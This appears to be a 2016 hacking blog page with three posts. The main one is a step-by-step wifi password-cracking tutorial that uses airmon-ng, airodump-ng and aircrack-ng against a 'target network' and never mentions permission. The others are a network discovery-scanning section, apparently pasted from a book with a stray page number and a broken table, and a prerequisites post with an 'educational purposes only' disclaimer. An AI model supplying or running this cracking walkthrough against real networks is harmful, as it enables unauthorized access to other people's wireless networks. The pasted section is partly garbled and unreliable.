We are legion, for we are many.

Sunday, July 10, 2016

How to know if your internet is hackable?

12:33:00 AM Posted by Unknown No comments
Cracking wifi passwords can be really tough but with the right guidance you can master it in no time. So, today I'll be teaching you how to hack wifi using kali linux.
The required accessories for this tutorial are:-


  • Kali linux.
  • A wireless adapter.
  • A very very good word list.
So after you have all these required items lets get to work.




  1. Open up you terminal and type "ifconfig"(without the quotations)
  2. If your adapter is woring fine you should see wlan0
  3. To start monitor mode type "airmon-ng start wlan0".(without the quotations)
  4. After you enter the code you will see a list of active processes, kill all these processes because they will trouble us later. kill them by typing "kill <process>" there will be two columns on the left will be numbers and on the right will be alphabets.  If on the left there is 804 and on the right there is networkmanager type "kill 804" to kill the process.
  5. To show the list of available WiFi network types, type in "airodump-ng wlan0mon".
  6. Start capturing the packets of your target network
    type the following command;
  7. airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 
  8. Stop the capturing using ctrl+c and type "ls" that would bring up all the current directories and files. Select the one with ".cap" extension and type the following command:\
  9. aircrack-ng -w <full location of word list> <name of the file>
Wait till it searches the wordlist for the passcode, if the passcode is present within the wordlist the output will give you the password or it will keep on searching.
Thank you guys for visiting and have a wonderful day ahead. And please do follow me on instagram and snapchat. 

What is discovery scanning?

12:05:00 AM Posted by Unknown No comments
Discovery scanning is the process of identifying live hosts on a network. In the context of
penetration testing, this is usually performed to identify potential targets for attack. The
objective here is not to exhaust resources in gathering information about targets, but instead,
to merely find out where the targets are logically located. The final product of our discovery
should be a list of IP addresses that we can then use for further analysis. In this chapter, we
will discuss how to discover hosts on a network by using protocols operating at layer 2, layer 3,
and layer 4 of the OSI model. The following tutorials will include each of the following recipes:
#Using Scapy to perform layer 2 discovery
#Using ARPing to perform layer 2 discovery
#Using Nmap to perform layer 2 discovery#Using NetDiscover to perform layer 2 discovery
#Using Metasploit to perform layer 2 discovery
#Using ICMP ping to perform layer 3 discovery
#Using Scapy to perform layer 3 discovery
#Using Nmap to perform layer 3 discovery
#Using fping to perform layer 3 discovery
#Using hping3 to perform layer 3 discovery
#Using Scapy to perform layer 4 discovery
#Using Nmap to perform layer 4 discovery
#Using hping3 to perform layer 4 discovery
Discovery Scanning
46
Prior to addressing each of these scanning techniques specifically, we should first address a
few underlying principles. The Open Systems Interconnection (OSI) model is an International
Organization for Standardization (ISO) standard that defines how networked systems
communicate. This model is divided into seven layers that define how application content can
be sent by one system and/or received by another. The upper layers of the OSI model tend to
be more visible to the end user, whereas the lower layers operate transparently to most casual
users. These layers consist of the following:
OSI model Layer description Protocols
Layer 7 – Application This layer involves the application software that
is sending and receiving data
HTTP, FTP,
and Telnet
Layer 6 – Presentation This layer defines how data is formatted
or organized
ASCII, JPEG, PDF,
PNG, and DOCX
Layer 5 – Session This layer involves application session control,
management, synchronization,
and termination
NetBIOS, PPTP,
RPC, and SOCKS
Layer 4 – Transport This layer involves end-to-end
communication services
TCP and UDP
Layer 3 – Network This layer involves logical system addressing IPv4, IPv6, ICMP,
and IPSec
Layer 2 – Data link This layer involves physical system addressing ARP
Layer 1 – Physical This layer involves the data stream that is
passed over the wire
The lower layers of the OSI model are largely used to ensure that network traffic successfully
arrives at its intended destination. Many of the commonly used protocols at these lower
layers necessitate a response from the destination system and, as such, can be leveraged
by potential attackers to identify live systems. Techniques discussed in the remainder of this
section will leverage layers 2, 3 and 4 protocols to discover live network systems. Prior to
addressing each of the specific recipes, we will briefly discuss the protocols used and how
they can be leveraged for discovery.
The pros and cons of layer 2 discovery with ARP are as follows:
***Pros:
‰‰ Very fast
‰‰ Highly reliable
***Cons:
‰‰ Cannot discover remote systems (non-routable protocol)

Saturday, July 9, 2016

Somethings you should know before you start hacking.

11:22:00 PM Posted by Unknown No comments
Hey anonymousa's how's your day going?? I hope it's going fine cuz if not ,boo hoo.
Alright so today I wont be giving off anything new just some things what you might need for further hacking's.
Hacking is just like cooking you take raw materials and make them into something wonderful. Hacking is not just kitty copying code and showboating to your relatives what you can do, its much more than that. You have to be creative with what you have and make the material offered to you work at your whim. 
So before hacking, we all have to make a  friendly environment in the computer system.
Things you'll need for the following tutorials:
  • An OS that supports pen testing  like backtrack or kali linux. I prefer to use kali linux because it has many applications that we'll need for pentesting.
  • A wireless network adapter if you're using kali on VMware or Virtual Box.
  • Approval from whoever you're doing these tests on.
That's about it for what you'll need.
So after you've got all the necessary items go to other blogs that I'll be posting so you get to enjoy the magic of hacking.
Note: The information's that I post here are meant for educational purposes only and I'll not be taking responsibility for the misuse of the information's given here. This goes for all the blogs that I post here.